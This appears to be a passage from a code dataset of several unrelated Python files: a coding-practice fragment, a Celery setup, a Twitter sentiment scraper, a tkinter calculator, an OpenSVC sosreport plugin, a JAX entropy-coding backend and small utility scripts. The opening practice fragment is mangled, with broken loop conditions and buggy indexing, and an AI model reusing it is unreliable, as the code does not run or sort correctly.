= [i for i in range(n)]\n# arr = list(map(int, input().split()))\n# arr_c= set(arr)\n# arr_c = sorted(arr_c)\n# data = tuple(zip( arr_c,size))\n\n# data = dict(data)\n\n# for i in arr:\n# print(data[i],end=\" \")\n\n\n# def func(arr):\n# last = arr[-1]\n\n# sum=0\n# for i,data in enumerate(arr[:-1]):\n# sum+=data\n# if sum == last:\n# return i\n# pass\n \n# pass\n\ndef compressword(word, k):\n # 10^5\n word = list(word)\n check = False\n while True:\n i=0\n while i =0:\n \n for idx in reversed(pos[:i+1]): # 거꾸로\n # print(\"p\",idx)\n if idx==0:#even\n pos[i] = even.get() \n else:\n break\n i-=1\n \n for idx in reversed(pos[:i+1]): # 거꾸로\n # print(i, idx)\n if idx==0:#even\n break\n else:\n pos[i] = odd.get()\n i-=1\n print(pos)\n \ndef bubbleSort_DESC(arr):\n n = len(arr)\n for i in range(n):\n for j in range(n-1, i, -1):\n if arr[j] > arr[j-1] and arr[j]%2==0 and arr[j-1%2]==0: #짝\n arr[j], arr[j-1] = arr[j-1], arr[j]\n elif arr[j] > arr[j-1] and arr[j]%2!=0 and arr[j-1%2]!=0: #홀\n arr[j], arr[j-1] = arr[j-1], arr[j]\n return arr\n\ndef largest(num):\n num = list(num)\n print(num)\n odd = PriorityQueue() #odd 홀수\n pos=[]\n\n even = PriorityQueue() # even\n # 작은 순서로 정렬되어서 들어감\n for i, data in enumerate(num):\n tmp = data\n \n if int(tmp)%2==0: # even\n func(pos,even,odd)\n even.put(tmp)\n pos.append(0)\n else:\n func(pos,even,odd)\n odd.put(tmp)\n pos.append(1)\n \n \n \n \n print(i,pos)\n \n return \"\".join(pos)\n \n \n\n# s = ['how it was done',\n# 'are you how'\n# ,'it goes to',\n# 'goes done are it']\n\n# q =['done it','it']\n\n\n# # s= ['it go will away'\n# # ,'go do art'\n# # ,'what to will east']\n\n# # q =['it will',\n# # 'go east will',\n# # 'will']\n# print('it' in 'what to will east')\n# print(textQueries(s,q))\na=\"1806579\"#(\"0082663\"\n\nprint(largest(a)) #8662003","repo_name":"97tkddnjs/Baekjoon","sub_path":"문제 풀이/스터디/18870.py","file_name":"18870.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"37506496917","text":"from typing import Any\n\nfrom celery import Celery\nfrom smtv_api import database\nfrom smtv_api import settings\nfrom flask import Flask\n\n\nclass CelerySetup:\n flask_app = Flask(__name__)\n flask_app.config.from_object(settings)\n flask_app.config.update(\n CELERY_BROKER_URL=settings.CELERY_BROKER_URL,\n CELERY_RESULT_BACKEND=settings.CELERY_RESULT_BACKEND\n )\n\n @classmethod\n def make_celery(cls) -> Any:\n '''\n\n :return: decorator: celery\n '''\n app = cls.flask_app\n database.db.init_app(app)\n celery = Celery(\n app.import_name,\n backend=app.config['CELERY_RESULT_BACKEND'],\n broker=app.config['CELERY_BROKER_URL'],\n )\n celery.conf.update(app.config)\n\n class ContextTask(celery.Task): # type: ignore\n def __call__(self, *args, **kwargs): # type: ignore\n with app.app_context():\n return self.run(*args, **kwargs)\n\n celery.Task = ContextTask\n return celery\n\n# celery = CelerySetup.make_celery()\n","repo_name":"AdamDomagalsky/smtv-micro-scpr","sub_path":"src/smtv_api/celery_service/celery_setup.py","file_name":"celery_setup.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"11140435076","text":"\"\"\"\nA module that contains several functions for extracting sentiment from Twitter data. The\nfunctions are as follows:\nget_date_range(since_date_str: str) -> tuple[str, str]: Is used to get the exact date\nrange for each month, since months have different number of days.\n\n\nclean_tweet(tweet: str, stopwords: list[str] = []) -> str: This function takes a tweet as\ninput and returns a cleaned version of it. The tweet is cleaned by removing URLs,\n@mentions, hashtags, punctuation, profanity, and non-alphanumeric characters. Optionally,\nthe function can remove a list of stopwords.\n\nget_sentiment_scores(text: str) -> dict[str, float]: This function calculates the\nsentiment scores of the input text using TextBlob and VADER. The function returns a\ndictionary containing the following keys: polarity, subjectivity, sentiment (positive,\nnegative, or neutral), negative score, neutral score, positive score, and compound score.\n\nget_sentiment_label(compound: float) -> str: This function takes a compound sentiment\nscore as input and returns the sentiment label (positive, negative, or neutral) of the\ntext.\n\nscrape_tweets(hashtags: list[str], since_date: str, lang: str, exclude_keywords:\nlist[str], num_tweets: int) -> list[dict]: This function scrapes tweets using snscrape and\nreturns a pandas DataFrame containing the following information about each tweet:\ndatetime, tweet ID, original text, username, likes, views, replies, retweets, followers,\nand extra hashtags. The function searches for tweets that contain a list of hashtags, are\nin the specified language, and do not contain any of the specified keywords. The function\nreturns a maximum of num_tweets tweets.\n\nmain(hashtags: list[str], since_date: str, lang: str, exclude_keywords: list[str],\nnum_tweets: int) -> None: This function is the main function that runs when the module is\nexecuted. The function calls the scrape_tweets function to scrape tweets and then calls\nthe get_sentiment_scores function to calculate the sentiment scores of the tweets. The\nfunction prints out the sentiment scores of each tweet.\n\"\"\"\nimport logging\nimport os\nimport re\n\nimport numpy as np\nimport pandas as pd\nimport snscrape.modules.twitter as sntwitter\nfrom better_profanity import profanity\nfrom textblob import TextBlob\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nformatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\n\ndef get_date_range(since_date_str: str) -> tuple[str, str]:\n \"\"\"\n Returns a tuple of the first and last date of the previous month from the given date\n string.\n\n Args:\n since_date_str (str): A string in the format '%Y-%m-%d' representing the starting\n date.\n\n Returns:\n Tuple[str, str]: A tuple of two strings representing the start and end date of the\n previous month in the format '%Y-%m-%d'.\n\n Example:\n >>> get_date_range('2022-02-15')\n ('2022-01-01', '2022-01-31')\n \"\"\"\n import calendar\n import datetime\n\n # Convert since date string to datetime.date object\n since_date = datetime.datetime.strptime(since_date_str, \"%Y-%m-%d\").date()\n\n # Calculate the first day of the previous month\n start_date = datetime.date(\n since_date.year, since_date.month, 1\n ) - datetime.timedelta(days=1)\n start_date = datetime.date(start_date.year, start_date.month, 1)\n\n # Calculate the last day of the previous month\n last_day_of_month = calendar.monthrange(start_date.year, start_date.month)[1]\n end_date = datetime.date(start_date.year, start_date.month, last_day_of_month)\n\n # Convert the dates to string format and return them\n # '2022-01-01'\n return start_date.strftime(\"%Y-%m-%d\"), end_date.strftime(\"%Y-%m-%d\")\n\n\ndef clean_tweet(tweet: str, stopwords: list[str] = []) -> str:\n \"\"\"\n Cleans a tweet by removing URLs, @mentions, hashtags, punctuation, profanity, and\n non-alphanumeric characters, and splitting it into words. Optionally remove a list of\n stopwords.\n\n Args:\n tweet (str): The tweet to be cleaned.\n stopwords (list[str], optional): A list of words to be removed. Defaults to [].\n\n Returns:\n str: The cleaned tweet.\n \"\"\"\n import string\n\n if isinstance(tweet, float):\n return \"\"\n\n # Remove URLs, @mentions, and hashtags\n tweet = re.sub(r\"(https?://\\S+|www\\.\\S+)\", \"\", tweet)\n tweet = re.sub(r\"@\\S+\", \"\", tweet)\n tweet = re.sub(r\"#[\\w-]+\", \"\", tweet)\n\n # Remove punctuation and brackets\n tweet = tweet.translate(str.maketrans(\"\", \"\", string.punctuation))\n tweet = re.sub(r\"\\[.*?\\]\", \"\", tweet)\n\n # Remove profanity and contractions\n tweet = profanity.censor(tweet.lower())\n tweet = re.sub(r\"'\\w+\", \"\", tweet)\n\n # Remove non-alphanumeric characters and split into words\n words = re.findall(r\"\\b\\w+\\b\", tweet)\n words = [w for w in words if w not in stopwords]\n\n # Join words back into a string\n cleaned_tweet = \" \".join(words)\n\n return cleaned_tweet\n\n\ndef get_sentiment_scores(text: str) -> dict[str, float]:\n \"\"\"\n Calculate the sentiment scores using TextBlob and VADER.\n Args:\n text (str): The text for which sentiment scores are to be calculated.\n Returns:\n A dictionary containing the following keys:\n Polarity (float): The polarity score of the text.\n Subjectivity (float): The subjectivity score of the text.\n Sentiment (str): The sentiment label of the text, i.e., positive, negative, or\n neutral.\n Negative Score (float): The negative sentiment score of the text.\n Neutral Score (float): The neutral sentiment score of the text.\n Positive Score (float): The positive sentiment score of the text.\n Compound Score (float): The compound sentiment score of the text.\n \"\"\"\n blob = TextBlob(text)\n polarity, subjectivity = blob.sentiment\n\n sia = SentimentIntensityAnalyzer()\n scores = sia.polarity_scores(text)\n return {\n \"Polarity\": polarity,\n \"Subjectivity\": subjectivity,\n \"Sentiment\": get_sentiment_label(scores[\"compound\"]),\n \"Negative Score\": scores[\"neg\"],\n \"Neutral Score\": scores[\"neu\"],\n \"Positive Score\": scores[\"pos\"],\n \"Compound Score\": scores[\"compound\"],\n }\n\n\ndef get_sentiment_label(compound: float) -> str:\n \"\"\"\n Get sentiment label (positive, negative, or neutral) from compound score value.\n Args:\n compound (float): The compound sentiment score of the text.\n Returns:\n A string representing the sentiment label of the text, i.e., positive, negative,\n or neutral.\n \"\"\"\n if compound > 0.1:\n return \"positive\"\n elif compound < -0.1:\n return \"negative\"\n else:\n return \"neutral\"\n\n\ndef scrape_tweets(\n hashtags: list[str],\n since_date: str,\n until_date: str,\n lang: str,\n exclude_keywords: list[str],\n num_tweets: int,\n hashtag_operator: str = \"OR\",\n) -> list[dict]:\n \"\"\"\n Use snscrape to scrape tweets and extract relevant data.>\n Args:\n hashtags (list[str]): A list of hashtags to search for.\n since_date (str): A string representing the date from which to start searching for\n tweets (YYYY-MM-DD format).\n lang (str): The language of the tweets to search for.\n exclude_keywords (list[str]): A list of keywords to exclude from the search results.\n num_tweets (int): The number of tweets to scrape.\n hastag_oerator(str): OR or AND in the query. defaults to OR.\n Returns:\n A pandas DataFrame\n \"\"\"\n query = (\n f\" {hashtag_operator} \".join(hashtags)\n + f\" lang:{lang} since:{since_date}\"\n + f\" until:{until_date}\"\n + \"\".join([f\" -{kw}\" for kw in exclude_keywords])\n )\n tweets_list = []\n logger.info(f\"processing tweets from {since_date} until {until_date}.\")\n for i, tweet in enumerate(\n sntwitter.TwitterSearchScraper(query, maxEmptyPages=100).get_items()\n ):\n if i >= num_tweets:\n break\n tweet_dict = {\n \"Datetime\": tweet.date,\n \"Tweet Id\": tweet.id,\n \"Original Text\": tweet.rawContent,\n \"Username\": tweet.user.username,\n \"Likes\": tweet.likeCount,\n \"Views\": int(tweet.viewCount) if tweet.viewCount is not None else 0,\n \"Replies\": tweet.replyCount,\n \"Retweets\": tweet.retweetCount,\n \"Followers\": tweet.user.followersCount,\n \"Extra Hashtags\": [\n tag.lower()\n for tag in re.findall(r\"#(\\w+)\", tweet.rawContent)\n if tag.lower() not in [h.lower().replace(\"#\", \"\") for h in hashtags]\n ],\n }\n tweets_list.append(tweet_dict)\n\n return pd.DataFrame(tweets_list)\n\n\ndef main(\n hashtags: list[str],\n since_date: str,\n until_date: str,\n lang: str,\n exclude_keywords: list[str],\n num_tweets: int,\n) -> pd.DataFrame:\n \"\"\"\n main function that utilizes scrape_tweets, clean_tweets and get_sentiment_scores\n to get a dataframe of tweets with desired data.\n \"\"\"\n tweets_df = scrape_tweets(\n hashtags, since_date, until_date, lang, exclude_keywords, num_tweets\n )\n\n # Clean text and add column to DataFrame\n if not tweets_df.empty:\n tweets_df[\"Cleaned Text\"] = tweets_df[\"Original Text\"].apply(clean_tweet)\n\n # Get sentiment scores and add columns to DataFrame\n sentiment_scores = tweets_df[\"Cleaned Text\"].apply(get_sentiment_scores)\n tweets_df = pd.concat([tweets_df, sentiment_scores.apply(pd.Series)], axis=1)\n\n # Add additional columns\n tweets_df = tweets_df[\n [\n \"Datetime\",\n \"Tweet Id\",\n \"Original Text\",\n \"Cleaned Text\",\n \"Polarity\",\n \"Subjectivity\",\n \"Sentiment\",\n \"Negative Score\",\n \"Neutral Score\",\n \"Positive Score\",\n \"Compound Score\",\n \"Username\",\n \"Likes\",\n \"Views\",\n \"Replies\",\n \"Retweets\",\n \"Followers\",\n \"Extra Hashtags\",\n ]\n ]\n\n return tweets_df\n\n\nif __name__ == \"__main__\":\n num_tweets = int(os.getenv(\"num_tweets\"))\n hashtags = [\n \"#xbox\",\n \"#xboxseriesx\",\n \"#xboxseriess\",\n \"#xboxone\",\n \"#xboxgames\",\n \"#xboxgamepass\",\n \"#xboxlive\",\n \"#xboxcommunity\",\n \"#xboxlivegold\",\n \"#xboxgamepassultimate\",\n \"#gamepassultimate\",\n ]\n start_date = os.getenv(\"start_date\")\n start_date_str, end_date_str = get_date_range(start_date)\n lang = os.getenv(\"lang\", \"en\")\n exclude_keywords = [\n \"sale\",\n \"discount\",\n \"buy\",\n \"shop\",\n \"promote\",\n \"click\",\n \"shopify\",\n \"playstation\",\n \"ps5\",\n \"ps4\",\n \"nintendo\",\n \"nintendoswitch\",\n ]\n\n df = main(\n hashtags, start_date_str, end_date_str, lang, exclude_keywords, num_tweets\n )\n data_vol = os.getenv(\"local_path\")\n df.to_parquet(f\"{data_vol}tweets-{start_date_str}.parquet\")\n logger.info(f\"saved data to file tweets-{start_date_str}.parquet\")\n","repo_name":"Liftingthedata/xbox_de_project","sub_path":"scrapers/twitter/sentiment_analysis.py","file_name":"sentiment_analysis.py","file_ext":"py","file_size_in_byte":11469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40973121442","text":"from tkinter import *\nimport math\nroot = Tk()\nroot.title('calculate')\nroot.geometry('500x300')\nshow = Label(root, text='',font=('宋体', 24), width=20, bg='yellow')\nshow.pack()\nframe = Frame(root)\nframe.pack()\n\n\ndef click(event):\n if event.widget['text'] in ('1','2','3','4','5','6','7','8','9','0','.','*','/','-','+'):\n show['text'] = show['text'] + event.widget['text']\n elif event.widget['text'] == '=' and show['text'] is not None:\n show['text'] = str(eval(show['text']))\n elif event.widget['text'] == '清空':\n show['text'] = ''\n elif event.widget['text'] == '退位':\n show['text'] = show['text'][0:-1]\n elif event.widget['text'] == 'sqrt':\n show['text'] = str(math.sqrt(float(show['text'])))\n\n\nname = ['清空','=','Null','Null2','.','退位','0','/','1','2','3','*','4','5','6','-','7','8','9','+','sqrt']\n\nfor i in range(len(name)):\n button = Button(frame, text=name[i], width=5)\n button.grid(row=i//4, column=i%4)\n button.bind('', click)\n\nmenu = Menu(root)\nf_menu = Menu(menu)\nf_menu.add_command(label='QUIT', command=root.quit)\nf_menu.add_command(label='退出', command=root.quit)\nmenu.add_cascade(label='菜单', menu=f_menu)\nroot['menu'] = menu\nroot.mainloop()","repo_name":"fanghuicocacola/Fanghui-Lang","sub_path":"python/Code/Python Learner/tk计算器3.py","file_name":"tk计算器3.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18915834346","text":"from sos.report.plugins import Plugin, IndependentPlugin\n\n\nclass Opensvc(Plugin, IndependentPlugin):\n\n short_desc = 'OpenSVC cluster and services (config and state collection)'\n plugin_name = 'opensvc'\n profiles = ('cluster', 'services', 'system')\n packages = ('opensvc',)\n\n def get_status(self, kind):\n getobjs = self.collect_cmd_output(\"om %s ls --color=no\" % kind)\n dirname = kind + '_status'\n if getobjs['status'] == 0:\n for line in getobjs['output'].splitlines():\n self.add_cmd_output(\n \"om %s print status --color=no\" % line,\n subdir=dirname\n )\n\n def setup(self):\n self.add_copy_spec([\n \"/etc/opensvc/*\",\n \"/var/log/opensvc/*\",\n \"/etc/conf.d/opensvc\",\n \"/etc/default/opensvc\",\n \"/etc/sysconfig/opensvc\",\n \"/var/lib/opensvc/*.json\",\n \"/var/lib/opensvc/list.*\",\n \"/var/lib/opensvc/ccfg\",\n \"/var/lib/opensvc/cfg\",\n \"/var/lib/opensvc/certs/ca_certificates\",\n \"/var/lib/opensvc/certs/certificate_chain\",\n \"/var/lib/opensvc/compliance/*\",\n \"/var/lib/opensvc/namespaces/*\",\n \"/var/lib/opensvc/node/*\",\n \"/var/lib/opensvc/sec/*\",\n \"/var/lib/opensvc/svc/*\",\n \"/var/lib/opensvc/usr/*\",\n \"/var/lib/opensvc/vol/*\",\n ])\n self.add_cmd_output([\n \"ls -laRt /var/lib/opensvc\",\n \"om pool status --verbose --color=no\",\n \"om net status --verbose --color=no\",\n \"om mon --color=no\",\n \"om daemon dns dump --color=no\",\n \"om daemon relay status --color=no\",\n \"om daemon status --format flat_json --color=no\"\n ])\n self.get_status('vol')\n self.get_status('svc')\n\n def postproc(self):\n # Example:\n #\n # [hb#2]\n # secret = mypassword\n # type = relay\n # timeout = 30\n #\n # to\n #\n # [hb#2]\n # secret = ****************************\n # type = relay\n # timeout = 30\n\n regexp = r\"(\\s*secret =\\s*)\\S+\"\n self.do_file_sub(\n \"/etc/opensvc/cluster.conf\",\n regexp,\n r\"\\1****************************\"\n )\n\n# vim: set et ts=4 sw=4 :\n","repo_name":"sosreport/sos","sub_path":"sos/report/plugins/opensvc.py","file_name":"opensvc.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":470,"dataset":"github-code","pt":"7"} +{"seq_id":"44630219623","text":"from typing import NamedTuple, Sequence, Tuple\n\nimport jax.lax as lax\nimport jax.numpy as jnp\nfrom jax.numpy import ndarray\nfrom jax.random import PRNGKey, randint\n\nHEAD_PRECISION, HEAD_DTYPE = 32, \"uint32\"\nTAIL_PRECISION, TAIL_DTYPE = 8, \"uint8\"\nHEAD_MIN = 1 << HEAD_PRECISION - TAIL_PRECISION\nTAIL_DEFAULT_PRNGKEY = PRNGKey(1337)\nTAIL_MAX = (1 << TAIL_PRECISION) - 1\n\n\nclass CrayTail(NamedTuple):\n \"\"\"\n Type for hahndling craystack API compressed message tail.\n\n The Craystack API decomposes a compressed message into a head and a tail.\n In JAX the tail is implemented as a 2-tuple with an int that points to the\n current index in the tail.\n\n The Craystack message structure is described in `A tutorial on the range\n variant of asymmetric numeral systems (J. Townsend)\n `_.\n\n Args:\n pointer: An integer pointing to the current end of data written\n to the end of the array.\n data: An array of tail data.\n \"\"\"\n\n pointer: ndarray\n data: ndarray\n\n\nclass CrayCompressedMessage(NamedTuple):\n \"\"\"\n Type for handling cray-stack API compressed messages.\n\n The Craystack API decomposes a compressed message into a head and a tail.\n In JAX the tail is implemented as a 2-tuple with an int that points to the\n current index in the tail.\n\n The Craystack message structure is described in `A tutorial on the range\n variant of asymmetric numeral systems (J. Townsend)\n `_.\n\n Args:\n head: Craystack head, typically an array of unsigned integers\n (typically 32-bit) taking the shape of the message.\n tail: Craystack tail, a tuple with a variable-length array of 8-bit\n unsigned integers and an integer that points to the current size\n of data written to the array.\n \"\"\"\n\n head: ndarray\n tail: CrayTail\n\n\ndef empty_message(shape: Sequence[int], tail_capacity: int) -> CrayCompressedMessage:\n \"\"\"\n Creates an empty message with the head initialized to the min value.\n\n Args:\n shape: Shape of message to create, excluding batch dimensions and\n message length.\n tail_capacity: Size of the Craystack tail.\n\n Returns:\n An empty base message.\n \"\"\"\n return CrayCompressedMessage(\n jnp.full(shape, HEAD_MIN, HEAD_DTYPE),\n empty_stack(tail_capacity),\n )\n\n\ndef empty_stack(capacity: int, prng_key: ndarray = TAIL_DEFAULT_PRNGKEY) -> CrayTail:\n \"\"\"Returns a tuple with the size of the stack and a stack array.\"\"\"\n return CrayTail(\n jnp.array([capacity]), randint(prng_key, (capacity,), 0, TAIL_MAX, TAIL_DTYPE)\n )\n\n\ndef tail_push(tail: CrayTail, push_indices: ndarray, data: ndarray) -> CrayTail:\n \"\"\"\n Push data to tail at specified indices.\n\n Args:\n tail: A CrayTail to push data to.\n push_indices: Indices specifying push locations (for interleaved\n coding).\n\n Returns:\n ``tail`` with data inserted at ``push_indices`` and tail pointer moved\n to end of new data.\n \"\"\"\n push_indices, data = jnp.ravel(push_indices), jnp.ravel(data)\n limit, tail_data = tail\n # insert current information batch into the tail\n return CrayTail(\n limit - push_indices.sum(),\n lax.dynamic_update_slice(\n tail_data, lax.sort_key_val(push_indices, data)[1], limit - data.size\n ),\n )\n\n\ndef tail_pop(\n tail: CrayTail, pop_indices: ndarray, allow_empty_pop: bool = False\n) -> Tuple[CrayTail, ndarray]:\n \"\"\"\n Pop data from tail at specified indices.\n\n Args:\n tail: A CrayTail to pop data from.\n pop_indices: Indices specifying pop locations (for interleaved\n coding).\n allows_empty_pops: A boolean that specifys if random bits should\n be created on demand, if the stack is depleted.\n\n Returns:\n A 2-tuple containing:\n ``tail`` with data popped from top of stack by moving the tail\n pointer.\n The information content that was popped.\n\n \"\"\"\n pop_indices_flat = jnp.ravel(pop_indices) # interleave flattening\n limit, data = tail\n unsorted = lax.sort_key_val(pop_indices_flat, jnp.arange(pop_indices.size))[1]\n\n limit = lax.cond(\n allow_empty_pop,\n lambda _: jnp.clip(limit + pop_indices.sum(), 0, len(data)),\n lambda _: limit + pop_indices.sum(),\n None,\n )\n # here we return a slice containing the information in the pop indices\n # we don't actually need to pop the values from the array - instead we just\n # move the pointer along and remove the popped values at the end\n return CrayTail(limit, data), jnp.reshape(\n lax.sort_key_val(\n unsorted,\n lax.dynamic_slice(\n data, limit - pop_indices.size, pop_indices_flat.shape # type: ignore\n ),\n )[1],\n pop_indices.shape,\n )\n\n\ndef push_symbols(\n compressed_message: CrayCompressedMessage,\n cdf_low: ndarray,\n cdf_high: ndarray,\n precision: int,\n) -> CrayCompressedMessage:\n \"\"\"\n Pushes information corresponding to a symbol on the top of the stack.\n\n Args:\n compressed_message: Input stack to have data pushed to.\n cdf_low: The low CDF value, e.g., ``cdf[symbol]``.\n cdf_high: The high CDF, e.g., ``cdf[symbol+1]``.\n precision: Operating precision for push operations.\n\n Returns:\n Compressed message with information content pushed to top of stack.\n \"\"\"\n head, tail = compressed_message\n frequencies = cdf_high - cdf_low\n\n # Why three writes you may ask?\n # The answer is to vectorize. In the pop function normally this is done\n # with a while loop that would renormalize the range in steps of 8 bits.\n # Since we're using 32 bits for the head the increments can come at levels\n # of 8, 16, or 24, depending on the starting value of the head. Since the\n # push operation is the inverse, we have three possible pushes.\n\n indices = head >> 2 * TAIL_PRECISION + HEAD_PRECISION - precision >= frequencies\n tail = tail_push(tail, indices, head.astype(TAIL_DTYPE))\n head = jnp.where(indices, head >> TAIL_PRECISION, head)\n\n indices = head >> 1 * TAIL_PRECISION + HEAD_PRECISION - precision >= frequencies\n tail = tail_push(tail, indices, head.astype(TAIL_DTYPE))\n head = jnp.where(indices, head >> TAIL_PRECISION, head)\n\n indices = head >> HEAD_PRECISION - precision >= frequencies\n tail = tail_push(tail, indices, head.astype(TAIL_DTYPE))\n head = jnp.where(indices, head >> TAIL_PRECISION, head)\n\n head_div_freqs, head_mod_freqs = jnp.divmod(head, frequencies)\n\n return CrayCompressedMessage(\n (head_div_freqs << precision) + head_mod_freqs + cdf_low, tail\n )\n\n\ndef pop_symbols(\n compressed_message: CrayCompressedMessage,\n cfs: int,\n cdf_low: int,\n cdf_high: int,\n precision: int,\n allow_empty_pops: bool = False,\n) -> CrayCompressedMessage:\n \"\"\"\n Pops information corresponding to single symbol from the top of the stack.\n\n Args:\n compressed_message: Input stack to have data popped from.\n cfs: The CDF symbol value.\n cdf_low: The low CDF value, e.g., ``cdf[symbol]``.\n cdf_high: The high CDF, e.g., ``cdf[symbol+1]``.\n precision: Operating precision for pop operations.\n\n Returns:\n Compressed message with information content popped from top of stack.\n \"\"\"\n frequencies = cdf_high - cdf_low\n head = jnp.array(\n frequencies * (compressed_message[0] >> precision) + cfs - cdf_low,\n dtype=HEAD_DTYPE,\n )\n tail = compressed_message[1]\n\n # Why range over three you may ask?\n # The answer is to vectorize. In the pop function normally this is done\n # with a while loop that would renormalize the range in steps of 8 bits.\n # Since we're using 32 bits for the head the increments can come at levels\n # of 8, 16, or 24, depending on the starting value of the head.\n\n for _ in range(3):\n indices = jnp.less(head, HEAD_MIN)\n tail, new_head = tail_pop(tail, indices, allow_empty_pops)\n head = jnp.where(indices, head << TAIL_PRECISION | new_head, head)\n\n return CrayCompressedMessage(head.astype(HEAD_DTYPE), tail)\n\n\ndef peek(compressed_message: CrayCompressedMessage, precision: int) -> int:\n \"\"\"\n Look at the top of the stack without popping.\n\n Args:\n compressed_message: Stack to peek into top of.\n precision: Precision with which to unpack Craystack head.\n\n Returns:\n Current CDF value from top of stack.\n \"\"\"\n head = compressed_message[0]\n return head & ((1 << precision) - 1)\n\n\ndef craymessage_to_array(\n compressed_message: CrayCompressedMessage,\n) -> Tuple[ndarray, int]:\n \"\"\"\n Flatten a CrayCompressedMessage to a single array.\n\n Args:\n compressed_message: Message to be flattened.\n\n Returns:\n A 2-tuple with:\n A flattened version of compressed_message.\n An integer specifying the message length.\n \"\"\"\n head, ([tail_limit], tail_data) = compressed_message\n head = jnp.ravel(head)\n return (\n jnp.concatenate(\n [\n (head >> 3 * TAIL_PRECISION).astype(TAIL_DTYPE), # type: ignore\n (head >> 2 * TAIL_PRECISION).astype(TAIL_DTYPE), # type: ignore\n (head >> TAIL_PRECISION).astype(TAIL_DTYPE), # type: ignore\n head.astype(TAIL_DTYPE),\n tail_data,\n ]\n ),\n head.shape[0] * 4 + tail_limit,\n )\n\n\ndef array_to_craymessage(\n compressed_message: ndarray, shape: Sequence[int], tail_limit: int\n) -> CrayCompressedMessage:\n \"\"\"\n Convert a flattened message back to CrayCompressedMessage format.\n\n Args:\n compressed_message: Message to be unflattened.\n shape: Shape of original message (specifies shape of the head).\n tail_limit: Size of the tail.\n\n Returns:\n Message in standard CrayCompressedMessage format.\n \"\"\"\n size = int(jnp.prod(jnp.array(shape)))\n head_highest, head_high, head_low, head_lowest, tail = jnp.split(\n compressed_message, [size, 2 * size, 3 * size, 4 * size]\n )\n head = (\n head_highest.astype(HEAD_DTYPE) << 3 * TAIL_PRECISION\n | head_high.astype(HEAD_DTYPE) << 2 * TAIL_PRECISION\n | head_low.astype(HEAD_DTYPE) << 1 * TAIL_PRECISION\n | head_lowest.astype(HEAD_DTYPE)\n )\n tail = CrayTail(jnp.array([tail_limit]), tail)\n\n return CrayCompressedMessage(jnp.reshape(head, size), tail)\n\n\ndef insert_zeros(\n message: ndarray, shape: Sequence[int], tail_capacity: int\n) -> Tuple[ndarray, int]:\n \"\"\"Insert zeros between head and tail based on tail capacity.\"\"\"\n head_size = int(jnp.prod(jnp.array(shape)) * 4)\n splits = jnp.split(message, [head_size])\n needed_zeros = tail_capacity - splits[1].shape[0]\n tail_limit = needed_zeros + 1\n\n if needed_zeros < 0:\n raise ValueError(\"tail_capacity insufficient for needed buffer size.\")\n\n return (\n jnp.concatenate((splits[0], jnp.zeros(needed_zeros, TAIL_DTYPE), splits[1])),\n tail_limit,\n )\n\n\ndef convert_to_embedded(\n compressed_messages: Sequence[ndarray],\n message_shape: Sequence[int],\n tail_capacity: int,\n) -> Tuple[ndarray, ndarray]:\n \"\"\"\n Embed a truncated list of byte arrays into equal-size arrays.\n\n Args:\n compressed_messages: Packed message to embed into a standard-length.\n message_shape: Shape of unpacked message.\n tail_capacity: Desired size of the tail.\n\n Returns:\n A 2-tuple containing:\n A full-length stack with the message embedded into constant sizes\n via zero-padding.\n A list of integers pointing to the end of each tail.\n \"\"\"\n embedded_messages = []\n tail_limits = []\n for cm in compressed_messages:\n cm_conv, tail_limit = insert_zeros(cm, message_shape, tail_capacity)\n embedded_messages.append(cm_conv)\n tail_limits.append(tail_limit)\n\n return jnp.stack(embedded_messages), jnp.stack(tail_limits)\n","repo_name":"facebookresearch/NeuralCompression","sub_path":"projects/jax_entropy_coders/craystack/_backend.py","file_name":"_backend.py","file_ext":"py","file_size_in_byte":12157,"program_lang":"python","lang":"en","doc_type":"code","stars":412,"dataset":"github-code","pt":"7"} +{"seq_id":"24241913296","text":"import math\nimport time\nimport board\nimport adafruit_mpu6050\ni=0\nlisty=[]\ni2c = board.I2C()\nmpu = adafruit_mpu6050.MPU6050(i2c)\n'''\nfor _ in range(10*51):\n\tif i!=50:\n\t\t\n\t\tx,y,z = mpu.acceleration\n\t\n\telse:\n\t\ttotal=math.sqrt(pow(x,2)+pow(y,2)+pow(z,2))\n\t\t#print (\"x: \"+str(x))\n\t\t#print (\"y: \"+str(y))\n\t\t#print (\"z: \"+str(z))\n\t\tprint (round(total,0))\n\t\ti=0\n i+=1\n'''\n'''\n\ninitRead=math.sqrt()\n\nif total in range(10):\n health-=1\nelif total in range(10,20):\n health-=2\n\n\n'''\n\ndef sumSquares(x,y,z):\n return math.sqrt(pow(x,2)+pow(y,2)+pow(z,2))\n\nprint(\"\\n\"*50)\n\nwhile True:\n x,y,z=mpu.acceleration\n movement = round(sumSquares(x,y,z),0)\n if movement>=20:\n print(movement)\n\n","repo_name":"cbatts1228/Portfolio","sub_path":"PythonProjects/BattsPiFighter/accelerometer6050.py","file_name":"accelerometer6050.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"407504549","text":"# encoding=utf-8\n\nimport os\nfrom shutil import copy\n\n\nclass Setup:\n def __init__(self):\n self.package_path = os.path.dirname(os.path.abspath(__file__))\n self.struct_file = open(self.package_path + \"/struct.txt\", \"r\")\n\n def setfile(self):\n for line in self.struct_file:\n filename, path = line.split(\" \")\n src = os.path.join(self.package_path, filename)\n des = path\n copy(src, des)\n\n\nif __name__ == \"__main__\":\n s = Setup()\n 